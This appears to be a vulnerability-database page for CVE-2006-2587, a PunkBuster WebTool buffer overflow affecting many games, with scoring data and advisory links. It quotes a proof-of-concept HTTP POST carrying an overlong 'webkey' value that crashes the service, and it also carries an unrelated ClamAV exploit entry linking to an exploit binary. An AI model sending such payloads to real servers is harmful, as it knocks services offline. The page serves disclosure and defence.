CVE-2006-2587
published 2006-05-25CVE-2006-2587: Buffer overflow in the WebTool HTTP server component in (1) PunkBuster before 1.229, as used by multiple products including (2) America's Army 1.228 and…
PriorityP429medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
5.11%
91.3th percentile
Buffer overflow in the WebTool HTTP server component in (1) PunkBuster before 1.229, as used by multiple products including (2) America's Army 1.228 and earlier, (3) Battlefield 1942 1.158 and earlier, (4) Battlefield 2 1.184 and earlier, (5) Battlefield Vietnam 1.150 and earlier, (6) Call of Duty 1.173 and earlier, (7) Call of Duty 2 1.108 and earlier, (8) DOOM 3 1.159 and earlier, (9) Enemy Territory 1.167 and earlier, (10) Far Cry 1.150 and earlier, (11) F.E.A.R. 1.093 and earlier, (12) Joint Operations 1.187 and earlier, (13) Quake III Arena 1.150 and earlier, (14) Quake 4 1.181 and earlier, (15) Rainbow Six 3: Raven Shield 1.169 and earlier, (16) Rainbow Six 4: Lockdown 1.093 and earlier, (17) Return to Castle Wolfenstein 1.175 and earlier, and (18) Soldier of Fortune II 1.183 and earlier allows remote attackers to cause a denial of service (application crash) via a long webkey parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| even_balance | punkbuster | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)
exploitdb·2006-10-17
CVE-2006-4182 Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)
Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)
---
Clam AntiVirus <= 0.88.4 (rebuildpe) Remote Heap Overflow PoC
Damian Put pucik[at]gazeta.pl
pucik[@]overflow.pl
http://overflow.pl
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2
# milw0rm.com [2006-10-17]
Exploit-DB
PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow (Denial of Service) (PoC)
exploitdb·2006-05-23
CVE-2006-2587 PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow (Denial of Service) (PoC)
PunkBuster MOV BYTE PTR SS:[ESP+1055],0
0511B3BE FF96 54010000 CALL DWORD PTR DS:[ESI+154]
0511B3C4 8BBC24 64100000 MOV EDI,DWORD PTR SS:[ESP+1064]
...
The ESI register is controlled by the attacker.
The memcpy function described above instead is located at offset
0512aea7.
##############################################################################
Send the following text file to the port on which is running PunkBuster
POST /pbsvweb HTTP/1.1
webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/pbwebbof-adv.txthttp://archives.neohapsis.com/archives/fulldisclosure/2006-05/0607.htmlhttp://secunia.com/advisories/20257http://securitytracker.com/id?1016155http://www.evenbalance.com/index.php?page=support-all.phphttp://www.osvdb.org/25738http://www.securityfocus.com/archive/1/434909/100/0/threadedhttp://www.securityfocus.com/bid/18106http://www.vupen.com/english/advisories/2006/1940https://exchange.xforce.ibmcloud.com/vulnerabilities/26608http://aluigi.altervista.org/adv/pbwebbof-adv.txthttp://archives.neohapsis.com/archives/fulldisclosure/2006-05/0607.htmlhttp://secunia.com/advisories/20257http://securitytracker.com/id?1016155http://www.evenbalance.com/index.php?page=support-all.phphttp://www.osvdb.org/25738http://www.securityfocus.com/archive/1/434909/100/0/threadedhttp://www.securityfocus.com/bid/18106http://www.vupen.com/english/advisories/2006/1940https://exchange.xforce.ibmcloud.com/vulnerabilities/26608
2006-05-25
Published